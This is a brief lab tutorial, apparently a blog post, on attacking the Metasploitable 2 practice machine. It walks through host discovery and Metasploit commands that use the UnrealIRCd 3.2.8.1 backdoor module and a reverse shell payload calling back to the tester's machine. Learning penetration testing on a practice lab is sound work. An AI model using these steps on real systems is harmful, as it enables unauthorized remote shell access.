Topic’s Covered

-Getting shell access

-Set Payload and configuring Payload

Hi Guys I’m Rohan Patil this is an article on penetration testing. You can download Metasploitable 2 from the here. I am glade to have mentor like Vishal Waghmare → medium link

Lets Start penetration testing using another Vulnerability.

Netdiscover

netdiscover result and our victim IP address is 192.168.0.111

As we have already cover the NMap in previous article you can refer the same.

We will search on Exploit-DB for UnrealIRCd and it result is below.

I have used UnrealIRCd 3.2.8.1 — Backdoor Command Execution (Metasploit) as it recommended.

Lets start MSFConsole

msfconsole -q

Search for the exploit available for UnrealIRCd on MSFConsole

search UnrealIRCd

MSFConsole is having UnrealIRCd 3.2.8.1 — Backdoor Command Execution exploit which will use

To use it we will select it

use 0

options

set rhosts 192.168.0.111

Now we are going to set payload to go so we have to see what payloads are available.

show payloads

I am going to use “payload/cmd/unix/reverse”

set payload payload/cmd/unix/reverse

options

Now set the lhost and run the exploit

set lhost 192.168.0.100

we have got the shell access

Converting normal shell into meterpreter and persistance is covered in previous article.

Thank You.